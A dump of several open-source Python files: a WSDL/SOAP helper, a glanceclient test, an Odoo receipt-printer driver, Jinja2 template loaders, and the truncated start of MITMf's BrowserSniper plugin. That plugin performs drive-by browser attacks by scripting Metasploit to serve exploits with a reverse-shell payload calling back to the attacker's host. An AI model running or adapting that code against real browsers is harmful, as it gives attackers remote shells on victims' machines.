portType = operation.getPortType()
targetNamespace = portType.getTargetNamespace()
ptName = portType.name
msgName = operation.input.name
if not msgName:
msgName = operation.name + 'Request'
if targetNamespace.endswith('/'):
return '%s%s/%s' %(targetNamespace, ptName, msgName)
return '%s/%s/%s' %(targetNamespace, ptName, msgName)
def GetWSAActionOutput(operation):
"""Find wsa:Action attribute, and return value or the default."""
attr = operation.output.action
if attr is not None:
return attr
targetNamespace = operation.getPortType().getTargetNamespace()
ptName = operation.getPortType().name
msgName = operation.output.name
if not msgName:
msgName = operation.name + 'Response'
if targetNamespace.endswith('/'):
return '%s%s/%s' %(targetNamespace, ptName, msgName)
return '%s/%s/%s' %(targetNamespace, ptName, msgName)
def FindExtensions(object, kind, t_type=type(())):
if isinstance(kind, t_type):
result = []
namespaceURI, name = kind
return [ item for item in object.extensions
if hasattr(item, 'nodeType') \
and DOM.nsUriMatch(namespaceURI, item.namespaceURI) \
and item.name == name ]
return [ item for item in object.extensions if isinstance(item, kind) ]
def FindExtension(object, kind, t_type=type(())):
if isinstance(kind, t_type):
namespaceURI, name = kind
for item in object.extensions:
if hasattr(item, 'nodeType') \
and DOM.nsUriMatch(namespaceURI, item.namespaceURI) \
and item.name == name:
return item
else:
for item in object.extensions:
if isinstance(item, kind):
return item
return None
class SOAPCallInfo:
"""SOAPCallInfo captures the important binding information about a
SOAP operation, in a structure that is easier to work with than
raw WSDL structures."""
def __init__(self, methodName):
self.methodName = methodName
self.inheaders = []
self.outheaders = []
self.inparams = []
self.outparams = []
self.retval = None
encodingStyle = DOM.NS_SOAP_ENC
documentation = ''
soapAction = None
transport = None
namespace = None
location = None
use = 'encoded'
style = 'rpc'
def addInParameter(self, name, type, namespace=None, element_type=0):
"""Add an input parameter description to the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.inparams.append(parameter)
return parameter
def addOutParameter(self, name, type, namespace=None, element_type=0):
"""Add an output parameter description to the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.outparams.append(parameter)
return parameter
def setReturnParameter(self, name, type, namespace=None, element_type=0):
"""Set the return parameter description for the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.retval = parameter
return parameter
def addInHeaderInfo(self, name, type, namespace, element_type=0,
mustUnderstand=0):
"""Add an input SOAP header description to the call info."""
headerinfo = HeaderInfo(name, type, namespace, element_type)
if mustUnderstand:
headerinfo.mustUnderstand = 1
self.inheaders.append(headerinfo)
return headerinfo
def addOutHeaderInfo(self, name, type, namespace, element_type=0,
mustUnderstand=0):
"""Add an output SOAP header description to the call info."""
headerinfo = HeaderInfo(name, type, namespace, element_type)
if mustUnderstand:
headerinfo.mustUnderstand = 1
self.outheaders.append(headerinfo)
return headerinfo
def getInParameters(self):
"""Return a sequence of the in parameters of the method."""
return self.inparams
def getOutParameters(self):
"""Return a sequence of the out parameters of the method."""
return self.outparams
def getReturnParameter(self):
"""Return param info about the return value of the method."""
return self.retval
def getInHeaders(self):
"""Return a sequence of the in headers of the method."""
return self.inheaders
def getOutHeaders(self):
"""Return a sequence of the out headers of the method."""
return self.outheaders
class ParameterInfo:
"""A ParameterInfo object captures parameter binding information."""
def __init__(self, name, type, namespace=None, element_type=0):
if element_type:
self.element_type = 1
if namespace is not None:
self.namespace = namespace
self.name = name
self.type = type
element_type = 0
namespace = None
default = None
class HeaderInfo(ParameterInfo):
"""A HeaderInfo object captures SOAP header binding information."""
def __init__(self, name, type, namespace, element_type=None):
ParameterInfo.__init__(self, name, type, namespace, element_type)
mustUnderstand = 0
actor = None
def callInfoFromWSDL(port, name):
"""Return a SOAPCallInfo given a WSDL port and operation name."""
wsdl = port.getService().getWSDL()
binding = port.getBinding()
portType = binding.getPortType()
operation = portType.operations[name]
opbinding = binding.operations[name]
messages = wsdl.messages
callinfo = SOAPCallInfo(name)
addrbinding = port.getAddressBinding()
if not isinstance(addrbinding, SoapAddressBinding):
raise ValueError, 'Unsupported binding type.'
callinfo.location = addrbinding.location
soapbinding = binding.findBinding(SoapBinding)
if soapbinding is None:
raise ValueError, 'Missing soap:binding element.'
callinfo.transport = soapbinding.transport
callinfo.style = soapbinding.style or 'document'
soap_op_binding = opbinding.findBinding(SoapOperationBinding)
if soap_op_binding is not None:
callinfo.soapAction = soap_op_binding.soapAction
callinfo.style = soap_op_binding.style or callinfo.style
parameterOrder = operation.parameterOrder
if operation.input is not None:
message = messages[operation.input.message]
msgrole = opbinding.input
mime = msgrole.findBinding(MimeMultipartRelatedBinding)
if mime is not None:
raise ValueError, 'Mime bindings are not supported.'
else:
for item in msgrole.findBindings(SoapHeaderBinding):
part = messages[item.message].parts[item.part]
header = callinfo.addInHeaderInfo(
part.name,
part.element or part.type,
item.namespace,
element_type = part.element and 1 or 0
)
header.encodingStyle = item.encodingStyle
body = msgrole.findBinding(SoapBodyBinding)
if body is None:
raise ValueError, 'Missing soap:body binding.'
callinfo.encodingStyle = body.encodingStyle
callinfo.namespace = body.namespace
callinfo.use = body.use
if body.parts is not None:
parts = []
for name in body.parts:
parts.append(message.parts[name])
else:
parts = message.parts.values()
for part in parts:
callinfo.addInParameter(
part.name,
part.element or part.type,
element_type = part.element and 1 or 0
)
if operation.output is not None:
try:
message = messages[operation.output.message]
except KeyError:
if self.strict:
raise RuntimeError(
"Recieved message not defined in the WSDL schema: %s" %
operation.output.message)
else:
message = wsdl.addMessage(operation.output.message)
print "Warning:", \
"Recieved message not defined in the WSDL schema.", \
"Adding it."
print "Message:", operation.output.message
msgrole = opbinding.output
mime = msgrole.findBinding(MimeMultipartRelatedBinding)
if mime is not None:
raise ValueError, 'Mime bindings are not supported.'
else:
for item in msgrole.findBindings(SoapHeaderBinding):
part = messages[item.message].parts[item.part]
header = callinfo.addOutHeaderInfo(
part.name,
part.element or part.type,
item.namespace,
element_type = part.element and 1 or 0
)
header.encodingStyle = item.encodingStyle
body = msgrole.findBinding(SoapBodyBinding)
if body is None:
raise ValueError, 'Missing soap:body binding.'
callinfo.encodingStyle = body.encodingStyle
callinfo.namespace = body.namespace
callinfo.use = body.use
if body.parts is not None:
parts = []
for name in body.parts:
parts.append(message.parts[name])
else:
parts = message.parts.values()
if parts:
for part in parts:
callinfo.addOutParameter(
part.name,
part.element or part.type,
element_type = part.element and 1 or 0
)
return callinfo
|
agpl-3.0
|
tylertian/Openstack
|
openstack F/python-glanceclient/tests/test_exc.py
|
3
|
1035
|
# Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import testtools
from glanceclient import exc
FakeResponse = collections.namedtuple('HTTPResponse', ['status'])
class TestHTTPExceptions(testtools.TestCase):
def test_from_response(self):
"""exc.from_response should return instance of an HTTP exception."""
out = exc.from_response(FakeResponse(400))
self.assertTrue(isinstance(out, exc.HTTPBadRequest))
|
apache-2.0
|
savoirfairelinux/OpenUpgrade
|
addons/hw_escpos/controllers/main.py
|
125
|
14043
|
# -*- coding: utf-8 -*-
import commands
import logging
import simplejson
import os
import os.path
import io
import base64
import openerp
import time
import random
import math
import md5
import openerp.addons.hw_proxy.controllers.main as hw_proxy
import pickle
import re
import subprocess
import traceback
from threading import Thread, Lock
from Queue import Queue, Empty
try:
import usb.core
except ImportError:
usb = None
try:
from .. import escpos
from ..escpos import printer
from ..escpos import supported_devices
except ImportError:
escpos = printer = None
from PIL import Image
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class EscposDriver(Thread):
def __init__(self):
Thread.__init__(self)
self.queue = Queue()
self.lock = Lock()
self.status = {'status':'connecting', 'messages':[]}
def supported_devices(self):
if not os.path.isfile('escpos_devices.pickle'):
return supported_devices.device_list
else:
try:
f = open('escpos_devices.pickle','r')
return pickle.load(f)
f.close()
except Exception as e:
self.set_status('error',str(e))
return supported_devices.device_list
def add_supported_device(self,device_string):
r = re.compile('[0-9A-Fa-f]{4}:[0-9A-Fa-f]{4}');
match = r.search(device_string)
if match:
match = match.group().split(':')
vendor = int(match[0],16)
product = int(match[1],16)
name = device_string.split('ID')
if len(name) >= 2:
name = name[1]
else:
name = name[0]
_logger.info('ESC/POS: adding support for device: '+match[0]+':'+match[1]+' '+name)
device_list = supported_devices.device_list[:]
if os.path.isfile('escpos_devices.pickle'):
try:
f = open('escpos_devices.pickle','r')
device_list = pickle.load(f)
f.close()
except Exception as e:
self.set_status('error',str(e))
device_list.append({
'vendor': vendor,
'product': product,
'name': name,
})
try:
f = open('escpos_devices.pickle','w+')
f.seek(0)
pickle.dump(device_list,f)
f.close()
except Exception as e:
self.set_status('error',str(e))
def connected_usb_devices(self):
connected = []
for device in self.supported_devices():
if usb.core.find(idVendor=device['vendor'], idProduct=device['product']) != None:
connected.append(device)
return connected
def lockedstart(self):
with self.lock:
if not self.isAlive():
self.daemon = True
self.start()
def get_escpos_printer(self):
try:
printers = self.connected_usb_devices()
if len(printers) > 0:
self.set_status('connected','Connected to '+printers[0]['name'])
return escpos.printer.Usb(printers[0]['vendor'], printers[0]['product'])
else:
self.set_status('disconnected','Printer Not Found')
return None
except Exception as e:
self.set_status('error',str(e))
return None
def get_status(self):
self.push_task('status')
return self.status
def open_cashbox(self,printer):
printer.cashdraw(2)
printer.cashdraw(5)
def set_status(self, status, message = None):
_logger.info(status+' : '+ (message or 'no message'))
if status == self.status['status']:
if message != None and (len(self.status['messages']) == 0 or message != self.status['messages'][-1]):
self.status['messages'].append(message)
else:
self.status['status'] = status
if message:
self.status['messages'] = [message]
else:
self.status['messages'] = []
if status == 'error' and message:
_logger.error('ESC/POS Error: '+message)
elif status == 'disconnected' and message:
_logger.warning('ESC/POS Device Disconnected: '+message)
def run(self):
if not escpos:
_logger.error('ESC/POS cannot initialize, please verify system dependencies.')
return
while True:
try:
timestamp, task, data = self.queue.get(True)
printer = self.get_escpos_printer()
if printer == None:
if task != 'status':
self.queue.put((timestamp,task,data))
time.sleep(5)
continue
elif task == 'receipt':
if timestamp >= time.time() - 1 * 60 * 60:
self.print_receipt_body(printer,data)
printer.cut()
elif task == 'xml_receipt':
if timestamp >= time.time() - 1 * 60 * 60:
printer.receipt(data)
elif task == 'cashbox':
if timestamp >= time.time() - 12:
self.open_cashbox(printer)
elif task == 'printstatus':
self.print_status(printer)
elif task == 'status':
pass
except Exception as e:
self.set_status('error', str(e))
errmsg = str(e) + '\n' + '-'*60+'\n' + traceback.format_exc() + '-'*60 + '\n'
_logger.error(errmsg);
def push_task(self,task, data = None):
self.lockedstart()
self.queue.put((time.time(),task,data))
def print_status(self,eprint):
localips = ['0.0.0.0','127.0.0.1','127.0.1.1']
ips = [ c.split(':')[1].split(' ')[0] for c in commands.getoutput("/sbin/ifconfig").split('\n') if 'inet addr' in c ]
ips = [ ip for ip in ips if ip not in localips ]
eprint.text('\n\n')
eprint.set(align='center',type='b',height=2,width=2)
eprint.text('PosBox Status\n')
eprint.text('\n')
eprint.set(align='center')
if len(ips) == 0:
eprint.text('ERROR: Could not connect to LAN\n\nPlease check that the PosBox is correc-\ntly connected with a network cable,\n that the LAN is setup with DHCP, and\nthat network addresses are available')
elif len(ips) == 1:
eprint.text('IP Address:\n'+ips[0]+'\n')
else:
eprint.text('IP Addresses:\n')
for ip in ips:
eprint.text(ip+'\n')
if len(ips) >= 1:
eprint.text('\nHomepage:\nhttp://'+ips[0]+':8069\n')
eprint.text('\n\n')
eprint.cut()
def print_receipt_body(self,eprint,receipt):
def check(string):
return string != True and bool(string) and string.strip()
def price(amount):
return ("{0:."+str(receipt['precision']['price'])+"f}").format(amount)
def money(amount):
return ("{0:."+str(receipt['precision']['money'])+"f}").format(amount)
def quantity(amount):
if math.floor(amount) != amount:
return ("{0:."+str(receipt['precision']['quantity'])+"f}").format(amount)
else:
return str(amount)
def printline(left, right='', width=40, ratio=0.5, indent=0):
lwidth = int(width * ratio)
rwidth = width - lwidth
lwidth = lwidth - indent
left = left[:lwidth]
if len(left) != lwidth:
left = left + ' ' * (lwidth - len(left))
right = right[-rwidth:]
if len(right) != rwidth:
right = ' ' * (rwidth - len(right)) + right
return ' ' * indent + left + right + '\n'
def print_taxes():
taxes = receipt['tax_details']
for tax in taxes:
eprint.text(printline(tax['tax']['name'],price(tax['amount']), width=40,ratio=0.6))
# Receipt Header
if receipt['company']['logo']:
eprint.set(align='center')
eprint.print_base64_image(receipt['company']['logo'])
eprint.text('\n')
else:
eprint.set(align='center',type='b',height=2,width=2)
eprint.text(receipt['company']['name'] + '\n')
eprint.set(align='center',type='b')
if check(receipt['company']['contact_address']):
eprint.text(receipt['company']['contact_address'] + '\n')
if check(receipt['company']['phone']):
eprint.text('Tel:' + receipt['company']['phone'] + '\n')
if check(receipt['company']['vat']):
eprint.text('VAT:' + receipt['company']['vat'] + '\n')
if check(receipt['company']['email']):
eprint.text(receipt['company']['email'] + '\n')
if check(receipt['company']['website']):
eprint.text(receipt['company']['website'] + '\n')
if check(receipt['header']):
eprint.text(receipt['header']+'\n')
if check(receipt['cashier']):
eprint.text('-'*32+'\n')
eprint.text('Served by '+receipt['cashier']+'\n')
# Orderlines
eprint.text('\n\n')
eprint.set(align='center')
for line in receipt['orderlines']:
pricestr = price(line['price_display'])
if line['discount'] == 0 and line['unit_name'] == 'Unit(s)' and line['quantity'] == 1:
eprint.text(printline(line['product_name'],pricestr,ratio=0.6))
else:
eprint.text(printline(line['product_name'],ratio=0.6))
if line['discount'] != 0:
eprint.text(printline('Discount: '+str(line['discount'])+'%', ratio=0.6, indent=2))
if line['unit_name'] == 'Unit(s)':
eprint.text( printline( quantity(line['quantity']) + ' x ' + price(line['price']), pricestr, ratio=0.6, indent=2))
else:
eprint.text( printline( quantity(line['quantity']) + line['unit_name'] + ' x ' + price(line['price']), pricestr, ratio=0.6, indent=2))
# Subtotal if the taxes are not included
taxincluded = True
if money(receipt['subtotal']) != money(receipt['total_with_tax']):
eprint.text(printline('','-------'));
eprint.text(printline(_('Subtotal'),money(receipt['subtotal']),width=40, ratio=0.6))
print_taxes()
#eprint.text(printline(_('Taxes'),money(receipt['total_tax']),width=40, ratio=0.6))
taxincluded = False
# Total
eprint.text(printline('','-------'));
eprint.set(align='center',height=2)
eprint.text(printline(_(' TOTAL'),money(receipt['total_with_tax']),width=40, ratio=0.6))
eprint.text('\n\n');
# Paymentlines
eprint.set(align='center')
for line in receipt['paymentlines']:
eprint.text(printline(line['journal'], money(line['amount']), ratio=0.6))
eprint.text('\n');
eprint.set(align='center',height=2)
eprint.text(printline(_(' CHANGE'),money(receipt['change']),width=40, ratio=0.6))
eprint.set(align='center')
eprint.text('\n');
# Extra Payment info
if receipt['total_discount'] != 0:
eprint.text(printline(_('Discounts'),money(receipt['total_discount']),width=40, ratio=0.6))
if taxincluded:
print_taxes()
#eprint.text(printline(_('Taxes'),money(receipt['total_tax']),width=40, ratio=0.6))
# Footer
if check(receipt['footer']):
eprint.text('\n'+receipt['footer']+'\n\n')
eprint.text(receipt['name']+'\n')
eprint.text( str(receipt['date']['date']).zfill(2)
+'/'+ str(receipt['date']['month']+1).zfill(2)
+'/'+ str(receipt['date']['year']).zfill(4)
+' '+ str(receipt['date']['hour']).zfill(2)
+':'+ str(receipt['date']['minute']).zfill(2) )
driver = EscposDriver()
driver.push_task('printstatus')
hw_proxy.drivers['escpos'] = driver
class EscposProxy(hw_proxy.Proxy):
@http.route('/hw_proxy/open_cashbox', type='json', auth='none', cors='*')
def open_cashbox(self):
_logger.info('ESC/POS: OPEN CASHBOX')
driver.push_task('cashbox')
@http.route('/hw_proxy/print_receipt', type='json', auth='none', cors='*')
def print_receipt(self, receipt):
_logger.info('ESC/POS: PRINT RECEIPT')
driver.push_task('receipt',receipt)
@http.route('/hw_proxy/print_xml_receipt', type='json', auth='none', cors='*')
def print_xml_receipt(self, receipt):
_logger.info('ESC/POS: PRINT XML RECEIPT')
driver.push_task('xml_receipt',receipt)
@http.route('/hw_proxy/escpos/add_supported_device', type='http', auth='none', cors='*')
def add_supported_device(self, device_string):
_logger.info('ESC/POS: ADDED NEW DEVICE:'+device_string)
driver.add_supported_device(device_string)
return "The device:\n"+device_string+"\n has been added to the list of supported devices.<br/><a href='/hw_proxy/status'>Ok</a>"
@http.route('/hw_proxy/escpos/reset_supported_devices', type='http', auth='none', cors='*')
def reset_supported_devices(self):
try:
os.remove('escpos_devices.pickle')
except Exception as e:
pass
return 'The list of supported devices has been reset to factory defaults.<br/><a href="/hw_proxy/status">Ok</a>'
|
agpl-3.0
|
kastriothaliti/techstitution
|
venv/lib/python2.7/site-packages/jinja2/loaders.py
|
333
|
17380
|
# -*- coding: utf-8 -*-
"""
jinja2.loaders
~~~~~~~~~~~~~~
Jinja loader classes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import weakref
from types import ModuleType
from os import path
from hashlib import sha1
from jinja2.exceptions import TemplateNotFound
from jinja2.utils import open_if_exists, internalcode
from jinja2._compat import string_types, iteritems
def split_template_path(template):
"""Split a path into segments and perform a sanity check. If it detects
'..' in the path it will raise a `TemplateNotFound` error.
"""
pieces = []
for piece in template.split('/'):
if path.sep in piece \
or (path.altsep and path.altsep in piece) or \
piece == path.pardir:
raise TemplateNotFound(template)
elif piece and piece != '.':
pieces.append(piece)
return pieces
class BaseLoader(object):
"""Baseclass for all loaders. Subclass this and override `get_source` to
implement a custom loading mechanism. The environment provides a
`get_template` method that calls the loader's `load` method to get the
:class:`Template` object.
A very basic example for a loader that looks up templates on the file
system could look like this::
from jinja2 import BaseLoader, TemplateNotFound
from os.path import join, exists, getmtime
class MyLoader(BaseLoader):
def __init__(self, path):
self.path = path
def get_source(self, environment, template):
path = join(self.path, template)
if not exists(path):
raise TemplateNotFound(template)
mtime = getmtime(path)
with file(path) as f:
source = f.read().decode('utf-8')
return source, path, lambda: mtime == getmtime(path)
"""
#: if set to `False` it indicates that the loader cannot provide access
#: to the source of templates.
#:
#: .. versionadded:: 2.4
has_source_access = True
def get_source(self, environment, template):
"""Get the template source, filename and reload helper for a template.
It's passed the environment and template name and has to return a
tuple in the form ``(source, filename, uptodate)`` or raise a
`TemplateNotFound` error if it can't locate the template.
The source part of the returned tuple must be the source of the
template as unicode string or a ASCII bytestring. The filename should
be the name of the file on the filesystem if it was loaded from there,
otherwise `None`. The filename is used by python for the tracebacks
if no loader extension is used.
The last item in the tuple is the `uptodate` function. If auto
reloading is enabled it's always called to check if the template
changed. No arguments are passed so the function must store the
old state somewhere (for example in a closure). If it returns `False`
the template will be reloaded.
"""
if not self.has_source_access:
raise RuntimeError('%s cannot provide access to the source' %
self.__class__.__name__)
raise TemplateNotFound(template)
def list_templates(self):
"""Iterates over all templates. If the loader does not support that
it should raise a :exc:`TypeError` which is the default behavior.
"""
raise TypeError('this loader cannot iterate over all templates')
@internalcode
def load(self, environment, name, globals=None):
"""Loads a template. This method looks up the template in the cache
or loads one by calling :meth:`get_source`. Subclasses should not
override this method as loaders working on collections of other
loaders (such as :class:`PrefixLoader` or :class:`ChoiceLoader`)
will not call this method but `get_source` directly.
"""
code = None
if globals is None:
globals = {}
# first we try to get the source for this template together
# with the filename and the uptodate function.
source, filename, uptodate = self.get_source(environment, name)
# try to load the code from the bytecode cache if there is a
# bytecode cache configured.
bcc = environment.bytecode_cache
if bcc is not None:
bucket = bcc.get_bucket(environment, name, filename, source)
code = bucket.code
# if we don't have code so far (not cached, no longer up to
# date) etc. we compile the template
if code is None:
code = environment.compile(source, name, filename)
# if the bytecode cache is available and the bucket doesn't
# have a code so far, we give the bucket the new code and put
# it back to the bytecode cache.
if bcc is not None and bucket.code is None:
bucket.code = code
bcc.set_bucket(bucket)
return environment.template_class.from_code(environment, code,
globals, uptodate)
class FileSystemLoader(BaseLoader):
"""Loads templates from the file system. This loader can find templates
in folders on the file system and is the preferred way to load them.
The loader takes the path to the templates as string, or if multiple
locations are wanted a list of them which is then looked up in the
given order::
>>> loader = FileSystemLoader('/path/to/templates')
>>> loader = FileSystemLoader(['/path/to/templates', '/other/path'])
Per default the template encoding is ``'utf-8'`` which can be changed
by setting the `encoding` parameter to something else.
To follow symbolic links, set the *followlinks* parameter to ``True``::
>>> loader = FileSystemLoader('/path/to/templates', followlinks=True)
.. versionchanged:: 2.8+
The *followlinks* parameter was added.
"""
def __init__(self, searchpath, encoding='utf-8', followlinks=False):
if isinstance(searchpath, string_types):
searchpath = [searchpath]
self.searchpath = list(searchpath)
self.encoding = encoding
self.followlinks = followlinks
def get_source(self, environment, template):
pieces = split_template_path(template)
for searchpath in self.searchpath:
filename = path.join(searchpath, *pieces)
f = open_if_exists(filename)
if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
mtime = path.getmtime(filename)
def uptodate():
try:
return path.getmtime(filename) == mtime
except OSError:
return False
return contents, filename, uptodate
raise TemplateNotFound(template)
def list_templates(self):
found = set()
for searchpath in self.searchpath:
walk_dir = os.walk(searchpath, followlinks=self.followlinks)
for dirpath, dirnames, filenames in walk_dir:
for filename in filenames:
template = os.path.join(dirpath, filename) \
[len(searchpath):].strip(os.path.sep) \
.replace(os.path.sep, '/')
if template[:2] == './':
template = template[2:]
if template not in found:
found.add(template)
return sorted(found)
class PackageLoader(BaseLoader):
"""Load templates from python eggs or packages. It is constructed with
the name of the python package and the path to the templates in that
package::
loader = PackageLoader('mypackage', 'views')
If the package path is not given, ``'templates'`` is assumed.
Per default the template encoding is ``'utf-8'`` which can be changed
by setting the `encoding` parameter to something else. Due to the nature
of eggs it's only possible to reload templates if the package was loaded
from the file system and not a zip file.
"""
def __init__(self, package_name, package_path='templates',
encoding='utf-8'):
from pkg_resources import DefaultProvider, ResourceManager, \
get_provider
provider = get_provider(package_name)
self.encoding = encoding
self.manager = ResourceManager()
self.filesystem_bound = isinstance(provider, DefaultProvider)
self.provider = provider
self.package_path = package_path
def get_source(self, environment, template):
pieces = split_template_path(template)
p = '/'.join((self.package_path,) + tuple(pieces))
if not self.provider.has_resource(p):
raise TemplateNotFound(template)
filename = uptodate = None
if self.filesystem_bound:
filename = self.provider.get_resource_filename(self.manager, p)
mtime = path.getmtime(filename)
def uptodate():
try:
return path.getmtime(filename) == mtime
except OSError:
return False
source = self.provider.get_resource_string(self.manager, p)
return source.decode(self.encoding), filename, uptodate
def list_templates(self):
path = self.package_path
if path[:2] == './':
path = path[2:]
elif path == '.':
path = ''
offset = len(path)
results = []
def _walk(path):
for filename in self.provider.resource_listdir(path):
fullname = path + '/' + filename
if self.provider.resource_isdir(fullname):
_walk(fullname)
else:
results.append(fullname[offset:].lstrip('/'))
_walk(path)
results.sort()
return results
class DictLoader(BaseLoader):
"""Loads a template from a python dict. It's passed a dict of unicode
strings bound to template names. This loader is useful for unittesting:
>>> loader = DictLoader({'index.html': 'source here'})
Because auto reloading is rarely useful this is disabled per default.
"""
def __init__(self, mapping):
self.mapping = mapping
def get_source(self, environment, template):
if template in self.mapping:
source = self.mapping[template]
return source, None, lambda: source == self.mapping.get(template)
raise TemplateNotFound(template)
def list_templates(self):
return sorted(self.mapping)
class FunctionLoader(BaseLoader):
"""A loader that is passed a function which does the loading. The
function receives the name of the template and has to return either
an unicode string with the template source, a tuple in the form ``(source,
filename, uptodatefunc)`` or `None` if the template does not exist.
>>> def load_template(name):
... if name == 'index.html':
... return '...'
...
>>> loader = FunctionLoader(load_template)
The `uptodatefunc` is a function that is called if autoreload is enabled
and has to return `True` if the template is still up to date. For more
details have a look at :meth:`BaseLoader.get_source` which has the same
return value.
"""
def __init__(self, load_func):
self.load_func = load_func
def get_source(self, environment, template):
rv = self.load_func(template)
if rv is None:
raise TemplateNotFound(template)
elif isinstance(rv, string_types):
return rv, None, None
return rv
class PrefixLoader(BaseLoader):
"""A loader that is passed a dict of loaders where each loader is bound
to a prefix. The prefix is delimited from the template by a slash per
default, which can be changed by setting the `delimiter` argument to
something else::
loader = PrefixLoader({
'app1': PackageLoader('mypackage.app1'),
'app2': PackageLoader('mypackage.app2')
})
By loading ``'app1/index.html'`` the file from the app1 package is loaded,
by loading ``'app2/index.html'`` the file from the second.
"""
def __init__(self, mapping, delimiter='/'):
self.mapping = mapping
self.delimiter = delimiter
def get_loader(self, template):
try:
prefix, name = template.split(self.delimiter, 1)
loader = self.mapping[prefix]
except (ValueError, KeyError):
raise TemplateNotFound(template)
return loader, name
def get_source(self, environment, template):
loader, name = self.get_loader(template)
try:
return loader.get_source(environment, name)
except TemplateNotFound:
# re-raise the exception with the correct fileame here.
# (the one that includes the prefix)
raise TemplateNotFound(template)
@internalcode
def load(self, environment, name, globals=None):
loader, local_name = self.get_loader(name)
try:
return loader.load(environment, local_name, globals)
except TemplateNotFound:
# re-raise the exception with the correct fileame here.
# (the one that includes the prefix)
raise TemplateNotFound(name)
def list_templates(self):
result = []
for prefix, loader in iteritems(self.mapping):
for template in loader.list_templates():
result.append(prefix + self.delimiter + template)
return result
class ChoiceLoader(BaseLoader):
"""This loader works like the `PrefixLoader` just that no prefix is
specified. If a template could not be found by one loader the next one
is tried.
>>> loader = ChoiceLoader([
... FileSystemLoader('/path/to/user/templates'),
... FileSystemLoader('/path/to/system/templates')
... ])
This is useful if you want to allow users to override builtin templates
from a different location.
"""
def __init__(self, loaders):
self.loaders = loaders
def get_source(self, environment, template):
for loader in self.loaders:
try:
return loader.get_source(environment, template)
except TemplateNotFound:
pass
raise TemplateNotFound(template)
@internalcode
def load(self, environment, name, globals=None):
for loader in self.loaders:
try:
return loader.load(environment, name, globals)
except TemplateNotFound:
pass
raise TemplateNotFound(name)
def list_templates(self):
found = set()
for loader in self.loaders:
found.update(loader.list_templates())
return sorted(found)
class _TemplateModule(ModuleType):
"""Like a normal module but with support for weak references"""
class ModuleLoader(BaseLoader):
"""This loader loads templates from precompiled templates.
Example usage:
>>> loader = ChoiceLoader([
... ModuleLoader('/path/to/compiled/templates'),
... FileSystemLoader('/path/to/templates')
... ])
Templates can be precompiled with :meth:`Environment.compile_templates`.
"""
has_source_access = False
def __init__(self, path):
package_name = '_jinja2_module_templates_%x' % id(self)
# create a fake module that looks for the templates in the
# path given.
mod = _TemplateModule(package_name)
if isinstance(path, string_types):
path = [path]
else:
path = list(path)
mod.__path__ = path
sys.modules[package_name] = weakref.proxy(mod,
lambda x: sys.modules.pop(package_name, None))
# the only strong reference, the sys.modules entry is weak
# so that the garbage collector can remove it once the
# loader that created it goes out of business.
self.module = mod
self.package_name = package_name
@staticmethod
def get_template_key(name):
return 'tmpl_' + sha1(name.encode('utf-8')).hexdigest()
@staticmethod
def get_module_filename(name):
return ModuleLoader.get_template_key(name) + '.py'
@internalcode
def load(self, environment, name, globals=None):
key = self.get_template_key(name)
module = '%s.%s' % (self.package_name, key)
mod = getattr(self.module, module, None)
if mod is None:
try:
mod = __import__(module, None, None, ['root'])
except ImportError:
raise TemplateNotFound(name)
# remove the entry from sys.modules, we only want the attribute
# on the module object we have stored on the loader.
sys.modules.pop(module, None)
return environment.template_class.from_module_dict(
environment, mod.__dict__, globals)
|
gpl-3.0
|
sechacking/MITMf
|
plugins/browsersniper.py
|
26
|
6804
|
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
import random
import threading
from time import sleep
from plugins.plugin import Plugin
from plugins.browserprofiler import BrowserProfiler
class BrowserSniper(BrowserProfiler, Plugin):
name = "BrowserSniper"
optname = "browsersniper"
desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
version = "0.4"
def initialize(self, options):
self.options = options
self.msfip = options.ip
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
from core.msfrpc import Msf
self.msf = Msf()
self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
t = threading.Thread(name='sniper', target=self.snipe)
t.setDaemon(True)
t.start()
def _setupExploit(self, exploit, msfport):
self.log.debug('Setting up {}'.format(exploit))
rand_url = "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
rand_port = random.randint(1000, 65535)
#generate the command string to send to the virtual console
cmd = "use exploit/{}\n".format(exploit)
cmd += "set SRVPORT {}\n".format(msfport)
cmd += "set URIPATH {}\n".format(rand_url)
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST {}\n".format(self.msfip)
cmd += "set LPORT {}\n".format(rand_port)
cmd += "set ExitOnSession False\n"
cmd += "exploit -j\n"
self.msf.sendcommand(cmd)
return rand_url
def _compat_system(self, os_config, brw_config, os, browser):
if (os_config == 'any') and (brw_config == 'any'):
return True
if (os_config == 'any') and (brw_config in browser):
return True
if (os_config in os) and (brw_config == 'any'):
return True
if (os_config in os) and (brw_config in browser):
return True
return False
def getExploits(self):
exploits = []
vic_ip = self.output['ip']
os = self.output['ua_name']
browser = self.output['os_name']
java = None
flash = None
if self.output['java'] is not None:
java = self.output['java']
if self.output['flash'] is not None:
flash = self.output['flash']
